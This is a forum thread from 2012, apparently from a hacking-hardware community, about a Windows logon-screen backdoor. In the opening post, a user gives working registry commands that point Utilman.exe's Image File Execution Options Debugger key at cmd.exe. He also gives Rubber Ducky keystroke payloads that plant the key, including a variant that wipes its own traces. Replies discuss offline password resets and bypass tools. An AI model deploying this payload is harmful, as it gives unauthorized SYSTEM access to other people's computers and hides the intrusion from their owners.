PCFreak Posted February 9, 2012 Share Posted February 9, 2012 Hi, I recently created a very nice utilman exploit, that I like to share with you. The difference to all other methods currently used with the ducky is, that my version does not need to change any system file. I just set a registry key and all is done. I will explain in detail here how it works. The current available utilman exploits using the Ducky change the user rights of utilman.exe, so that it can be backed up and replaced with cmd.exe. This is a huge change to the system and it leaves a lot of traces. <_< As described in this Microsoft Article about "Launching the debugger automatically", you can set up your application to start Visual Studio when you launch the application from Windows. Visual Studio will load your application, ready for debugging, but will not commence debugging until you issue an execution command. Having Visual Studio launch the debugger in this way is useful for debugging services and COM out-of-proc servers. Reading further in this article, you learn how to setup the system, that instead of the "real program" the debugger is executed. So let's apply that to the utilman exploit. We just need to tell the system to execute CMD.EXE instead of UTILMAN.EXE to be able to logon to the system just by clicking the "Ease of Access"-button at the logon screen. Nothing is easier than that, just use this command (as an administrative user): REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f That's all - Try it out! So one could now combine the already available payload for an administrative command prompt on Windows 7 GUI DELAY 50 STRING cmd MENU STRING a ENTER LEFT ENTER DELAY 200 with this STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f ENTER STRING EXIT ENTER and has now the ability to login to this system whenever he wants to just by clicking the "Ease of Access"-button at the logon screen. You could go one step further by using this code to add the registry key: STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d "cmd.exe /c start """Utilman Exploit by PCFreak""" cmd.exe /s /k REG DELETE """HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe""" /f && @echo Enjoy!" /f ENTER STRING EXIT ENTER This does the same, but when using utilman.exe (Press EoA-button on lock screen) the opening command shell automatically removes its tracks from the registry and stays open, so after using the exploit it is not trackable any more. Currently I cannot try this myself with the USB Rubberducky, since I have a german keyboard and with the ducky it is still not possible to switch keyboard layouts but the above code should work. I have a working code and a demonstration video how it works on my blog (blog.pcfreak.de) Here is the source code for the Teensy 2.0 board. http://blog.pcfreak.de/wp-content/upload/most_sophisticated_utilman_exploit.zip I hope you find this sophisticated method interesting and have fun with it. ;) Cheers PCFreak Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted February 9, 2012 Share Posted February 9, 2012 I like it! I wrote the original payload for Utilman. I've never heard of this method before, but I really like the sound of it! Is cmd.exe still ran with SYSTEM level privileges, like Utilman.exe is, though? I doubt that the debugger would cause it not to, but that would really put a dampner on aim of the payload. Quote Link to comment Share on other sites More sharing options...
PCFreak Posted February 9, 2012 Author Share Posted February 9, 2012 I like it! I wrote the original payload for Utilman. I've never heard of this method before, but I really like the sound of it! Is cmd.exe still ran with SYSTEM level privileges, like Utilman.exe is, though? I doubt that the debugger would cause it not to, but that would really put a dampner on aim of the payload. It runs as system as utilman would. The system executes the debugger (which is now cmd.exe) as it would execute utilman! The replacement (debugger) runs in the same context as the executable would ran originally. Just try it out. Cheers PCFreak Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted February 9, 2012 Share Posted February 9, 2012 I have now. This is a great find! I'm sure people will be able to find many applications for this idea... Quote Link to comment Share on other sites More sharing options...
ZDavid Posted February 10, 2012 Share Posted February 10, 2012 This is a great find! I like it. But it must be used in login user at first time. How can i bypass login? That is, I use it when not login. thanks. Quote Link to comment Share on other sites More sharing options...
PCFreak Posted February 10, 2012 Author Share Posted February 10, 2012 This is a great find! I like it. But it must be used in login user at first time. How can i bypass login? That is, I use it when not login. thanks. The original utilman exploit is usually used to reset the password on Windows 7 machines by booting a Linux Live CD and copy utilman.exe to utilman.bak copy cmd.exe to utilman.exe and then reboot. When pressing the EoA button you can reset the password in the opening system shell. The goal of my payload was to show our employees in the "IT Security and Safety Training" what an attacker can do if it has 30 seconds access to an unlocked Windows 7 machine. Believe me, showing them something is better than just telling them! And the USBRubberDucky is the ideal device to do so! But the technique with the registry key could also be used for the password recovery purpose. Instead of making modifications to utilman.exe it would be easier just to offline edit the registry to do the same. The nice thing about the Registry method is, that you could auto-delete the key on execution and the system works as it did before. I am currently thinking about writing a small programm for a Live-Windows-PE-CD and/or Linux that does exactly that. My idea is, that you just execute ResetPass [path to Software hive] [username] [new password] So just calling (Linux) ResetPass '/mnt/C/Windows/System32/config/software' "pcfreak" "changeme" (Windows) ResetPass.exe 'X:\Windows\System32\config\software' "pcfreak" "changeme" would place the correct command into the registry that needs to get executed to reset the password for user "pcfreak" to "changeme". After booting the system and pressing the EoA button you can login with the new password. When I have the time to code this and it is working I will sure let you know. Cheers PCFreak Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted February 10, 2012 Share Posted February 10, 2012 Writing it for linux I'm sure would be a very popular option, as I'm sure I'm not the only one who carries a bootable linux distro on their usb.. Quote Link to comment Share on other sites More sharing options...
Wario Posted February 12, 2012 Share Posted February 12, 2012 Forgive me if this is a dumb question; I'm just getting started on this topic. However are registry changes a standard permission for System level users? I cannot change any registry keys on my workplace computer, so would this make the original Utilman epxloit more suitable for the goal of adding an admin account without having prior admin access? Quote Link to comment Share on other sites More sharing options...
PCFreak Posted February 12, 2012 Author Share Posted February 12, 2012 Forgive me if this is a dumb question; I'm just getting started on this topic. However are registry changes a standard permission for System level users? I cannot change any registry keys on my workplace computer, so would this make the original Utilman epxloit more suitable for the goal of adding an admin account without having prior admin access? As a user you only can write to "your" part of the registry which is "HKCU" (HKEY_CURRENT_USER). To be able to write to "HKLM" (HKEY_LOCAL_MACHINE) you need administrative rights. The original Utilman exploit also needs administrative rights or needs to be applied from an external booted operating system, since it changes files in Windows\system32 directory. The utilman exploit is not a "privilege escalation" exploit. If you have physical access to a machine (which you of course need to plugin the Ducky) you can always get access. The only way to avoid this is to always lock your machine when leaving it and fully encrypt your hard drive. Concerning your work place computer. Maybe your administrator did the right thing and did not gave you administrative rights or you just did not start regedit or whatever program you use to edit the registry with administrative rights? I use the utilman exploit with the registry key only for the purpose to show our employees how dangerous it is not to lock your machine. Cheers PCFreak Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted February 12, 2012 Share Posted February 12, 2012 If you can, try booting into a Linux distro and use an offline registry editor like chntpw. I know Backtrack comes with chntpw already available, or even maybe using the Offline NT Password and Registry Editor. Here is the link. Quote Link to comment Share on other sites More sharing options...
abs0lut3z33r0 Posted February 21, 2012 Share Posted February 21, 2012 @PCFreak , which one do you recommend as a replacement for usb rubber ducky . i find it costly . Is the teensy fine for the payloads or should i consider 2.0 , Teensy++ . are payload compatible between different teensy models Quote Link to comment Share on other sites More sharing options...
PCFreak Posted February 21, 2012 Author Share Posted February 21, 2012 @PCFreak , which one do you recommend as a replacement for usb rubber ducky . i find it costly . Is the teensy fine for the payloads or should i consider 2.0 , Teensy++ . are payload compatible between different teensy models I have a Teensy 2.0. It is enough for just emulating a HID device. It costs 16$ and does it exactly what it should. Btw. you can do much more with it, since it also many I/O ports on it. The difference between the Teensy and the ducky is, that the ducky is smaller and that the payload comes from the SD-Card. On the teensy you have to plugin the Teensy to program and the payload is stored in the RAM on the Teensy. You have about 32K available. A normal payload takes about 4k. I recommend you read this page http://www .irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle and use Irongeeks "phukd" library to make it easier for you. It depends on you. If you understand a little bit about programming, then the Teensy is a good choice. If the Ducky would be perfect (Firmware + Encoder) it's price would be okay. At the moment it is too expensive, since the software for the ducky is not very well programmed. If you have further questions just send me a PM. Cheers PCFreak Quote Link to comment Share on other sites More sharing options...
abs0lut3z33r0 Posted February 21, 2012 Share Posted February 21, 2012 thxs for your respone , i am going with teensy for now Quote Link to comment Share on other sites More sharing options...
skimpniff Posted February 21, 2012 Share Posted February 21, 2012 This is a great find! I like it. But it must be used in login user at first time. How can i bypass login? That is, I use it when not login. thanks. This is my go-to. http://www.kryptoslogic.com/area02/item02/index.html Quote Link to comment Share on other sites More sharing options...
PCFreak Posted February 23, 2012 Author Share Posted February 23, 2012 This is my go-to. http://www.kryptoslogic.com/area02/item02/index.html I know KonBoot. They had an episode about it on hak5. - Nice ! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.